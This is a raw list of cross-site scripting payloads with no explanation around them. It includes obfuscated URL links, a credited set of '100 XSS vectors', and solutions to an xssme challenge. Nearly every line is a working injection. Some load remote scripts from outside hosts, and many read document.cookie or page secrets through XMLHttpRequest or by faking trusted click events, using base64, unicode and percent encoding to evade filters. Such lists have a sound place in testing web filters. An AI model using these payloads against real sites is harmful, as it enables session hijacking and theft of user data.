<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="h
tt p://6	6.000146.0x7.147/">XSS</A>
<A HREF="//www.google.com/">XSS</A>
<A HREF="//google">XSS</A>
<A HREF="http://ha.ckers.org@google">XSS</A>
<A HREF="http://google:ha.ckers.org">XSS</A>
<A HREF="http://google.com/">XSS</A>
<A HREF="http://www.google.com./">XSS</A>
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
????????????????????????
100 #XSS Vectors by @soaj1664ashar
<iframe %00 src="	javascript:prompt(1)	"%00>
<svg><style>{font-family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"
<sVg><scRipt %00>alert(1) {Opera}
<img/src=`%00` onerror=this.onerror=confirm
<form><isindex formaction="javascript:confirm(1)"
<img src=`%00`
 onerror=alert(1)

<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
<ScRipT 5-0*3?=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
"><h1/onmouseover='\u0061lert(1)'>%00
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
<img/	  src=`~` onerror=prompt(1)>
<form><iframe 	  src="javascript:alert(1)" 	;>
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
�</form><input type="date" onfocus="alert(1)">
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
<iframe srcdoc='<body onload=prompt(1)>'>
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
<script ~~~>alert(0%0)</script ~~~>
<style/onload=<!--	> alert (1)>
<///style///><span %2F onmousemove='alert(1)'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert(1)'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe/%00/ src=javaSCRIPT:alert(1)
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt/*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
<a/href="javascript: javascript:prompt(1)"><input type="X">
</plaintext\></|\><plaintext/onmouseover=prompt(1)
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
<a href="javascript:\u0061le%72t(1)"><button>
<div onmouseover='alert(1)'>DIV</div>
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<a href="jAvAsCrIpT:alert(1)">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>
<a href=javascript:alert(document.cookie)>Click Here</a>
<img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);</script -->
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
http://www.<script>alert(1)</script .com
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
<svg><script ?>alert(1)
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u006worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
<object data=javascript:\u0061le%72t(1)>
<script>++1-+?(1)</script>
<body/onload=<!-->
alert(1)>
<script itworksinallbrowsers>/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
<svg><script>//
confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<script x> alert</script 1=2
<div/onmouseover='alert(1)'> style="x:">
<--`<img/src=` onerror=alert(1)> --!>
<script/src=data:text/javascript,alert(1)></script>
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
"><img src=x onerror=window.open('https://www.google.com/');>
<form><button formaction=javascript:alert(1)>CLICKME
<math><a xlink:href="//jsfiddle.net/t846h/">click
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik></object>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
1<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
????????????????????????
AND EVEN MORE:
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
<<scr\0ipt/src=http://xss.com/xss.js></script
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
' onmouseover=alert(/Black.Spook/)
"><iframe%20src="http://google.com"%%203E
'<script>window.onload=function(){document.forms[0].message.value='1';}</script>
xî</title><img src%3dx onerror%3dalert(1)>
<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>
<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>
<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>
<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>
<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>
<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>
<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script>
<script>alert(document.head.innerHTML.substr(146,20));</script>
<script>alert(document.head.childNodes[3].text)</script>
<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>
<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>
<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script>
<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#
<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23
<script for=document event=onreadystatechange>getElementById('safe123').click()</script>
<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>
<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>
<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>
<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>
<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>
<a href="javascript:\u0061le%72t(1)"><button>
<div onmouseover='alert(1)'>DIV</div>
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<a href="jAvAsCrIpT:alert(1)">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
<var onmouseover="prompt(1)">On Mouse Over</var>?
<a href=javascript:alert(document.cookie)>Click Here</a>
<img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);</script -->
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=``<div/onmouseover='alert(1)'>X</div>
http://www.<script>alert(1)</script .com
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ?
<svg><script ?>alert(1)
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>?
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script ????????????
<object data=javascript:\u0061le%72t(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=<!-->
alert(1)>
<script itworksinallbrowsers>/*<script* */alert(1)</script ?
<img src ?itworksonchrome?\/onerror = alert(1)???
<svg><script>//
confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<script x> alert(1) </script 1=2
<div/onmouseover='alert(1)'> style="x:">
<--`<img/src=` onerror=alert(1)> --!>
<script/src=data:text/javascript,alert(1)></script> ?
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?
"><img src=x onerror=window.open('https://www.google.com/');>
<form><button formaction=javascript:alert(1)>CLICKME
<math><a xlink:href="//jsfiddle.net/t846h/">click
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
"><img src=x onerror=prompt(1);>
<style>@import'javascript:alert("XSS")';</style>
alert("XSS")'); ?>
<marquee><script>alert('XSS')</script></marquee>
window.alert("Bonjour !");
";' > out
<map name="planetmap"><area a-=">" shape="rect" href="javascript:alert(-1)" coords="0,0,145,126"></map>
--!> <script src="data:text/javascript,alert(1)"></script>
x "></t:set></xss><button formaction="javascript:alert(1)">CLICKME
#
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script>